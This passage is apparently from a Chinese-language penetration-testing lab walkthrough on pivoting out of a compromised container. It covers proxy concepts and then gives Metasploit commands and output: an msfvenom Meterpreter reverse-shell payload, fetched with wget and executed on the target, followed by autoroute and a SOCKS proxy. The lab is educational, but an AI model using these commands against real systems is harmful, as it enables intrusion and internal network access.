自此已经有相当大的把握确定我们处在容器中
服务代理内网流量代理
- 正向代理 (Forward Proxy) 通常应用在目标有防火墙或者不出网,我们能访问它的情况下:
Client-> proxy-> Target - 反向代理 (Reverse Proxy) 通常应用在目标有防火墙或者不允许外界访问 , 但是它们能访问我们的情况下:
Client <--> proxy <--> firewall <--> Target
- SOCKS4: 支持TELNET、FTPHTTP等TCP协议
- SOCKS5: 支持TCP与UDP,并支持安全认证方案
- 端口转发工具:NC, LCX, regGorg, venom, ngrock ...
- 代理链工具:proxychains(Linux), proxifier(windows) ...
sudo apt-get install metasploit-framework- 首页使用
msfvenom生成linux/x64/meterpreter/reverse_tcp模块的木马
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.56.103 lpost=4444 -f elf -o s.elf - 上传生成的木马 shell.elf 通过在本地当前目录【shell.elf 所在的目录】使用
python3 -m http.server 80挂起一个 HTTP 服务
- 在目标容器系统中使用
wget命令 [wget httlp://kali的ip地址/shell.elf] 下载本地的 shell.elf 之后使用 ls 命令确认其存在
- 在 kali 上使用
msfconsole命令后执行下列代码>挂起kali本地自己192.168.56.103:4444的监听
msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcppayload => linux/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.56.103lhost => 192.168.56.103msf6 exploit(multi/handler) > set lport 4444lport => 4444msf6 exploit(multi/handler) > run - 在目标容器系统中改 shell.elf 文件权限,使其可以执行并将其执行,也可以
chmod +x ./shell.elf && ./shell.elf之后查看 kali 是否响应
/app # chmod +x ./shell.elf/app # ./shell.elf
shell 调用目标容器系统 shell 进行简单的探查,比如使用 ip a 查看目标容器系统的内网状态,确定其内网网段 172.17.0.3/16 后使用 exit; 退出```txt[*] Started reverse TCP handler on 192.168.56.103:4444[*] Sending stage (3045348 bytes) to 192.168.56.101[*] Meterpreter session 1 opened (192.168.56.103:4444 -> 192.168.56.101:36424) at 2022-10-19 17:38:38 +0800meterpreter > shellProcess 18 created.Channel 1 created.lsDockerfilemain.pyrequirements.txtshell.elftemplatesip a1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWNlink/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft forever6: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UPlink/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ffinet 172.17.0.3/16 brd 172.17.255.255 scope global eth0valid_lft forever preferred_lft foreverexit```- 将获取的网段
172.17.0.3/16->172.17.0.0/16添加路由run autoroute -s 172.17.0.0/16命令,查看是否成功添加run autoroute -p
meterpreter > run autoroute -s 172.17.0.0/16[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 172.17.0.0/255.255.0.0...[+] Added route to 172.17.0.0/255.255.0.0 via 192.168.56.101[*] Use the -p option to list all active routesmeterpreter > run autoroute -p[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]Active Routing Table====================SubnetNetmaskGateway--------------------172.17.0.0255.255.0.0Session 1 - 创建成功之后我们将当前的会话挂起,使用
background是将当前 msf 会话挂起,想重新利用会话使用sessions -i其中 i 是会话编号
meterpreter > background[*] Backgrounding session 1...
- 继续前面的,使用
use auxiliary/server/socks_proxy进入代理模块
- 设置服务版本
set VERSION 4a - 设置 IP
set SRVHOST Kali的IP - 查看配置是否正确
show options - 收尾
exploit
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxymsf6 auxiliary(server/socks_proxy) > set VERSION 4aVERSION => 4amsf6 auxiliary(server/socks_proxy) > set SRVHOST 192.168.56.103SRVHOST => 192.168.56.103msf6 auxiliary(server/socks_proxy) > show optionsModule options (auxiliary/server/socks_proxy):NameCurrent SettingRequiredDescription--------------------------------------SRVHOST192.168.56.103yesThe local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT1080yesThe port to listen onVERSION4ayesThe SOCKS version to use (Accepted: 4a, 5)Auxiliary action:NameDescription---------------ProxyRun a SOCKS proxy servermsf6 auxiliary(server/socks_proxy) > exploit[*] Auxiliary module running as background job 0.[*] Starting the SOCKS proxy server推荐阅读
- 设置服务版本
